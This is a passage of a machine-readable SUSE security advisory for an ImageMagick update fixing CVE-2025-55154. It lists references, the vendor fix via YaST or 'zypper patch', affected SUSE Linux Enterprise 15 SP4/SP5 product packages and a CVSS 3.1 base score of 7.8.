"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-55154",
"url": "https://www.suse.com/security/cve/CVE-2025-55154"
},
{
"category": "external",
"summary": "SUSE Bug 1248078 for CVE-2025-55154",
"url": "https://bugzilla.suse.com/1248078"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
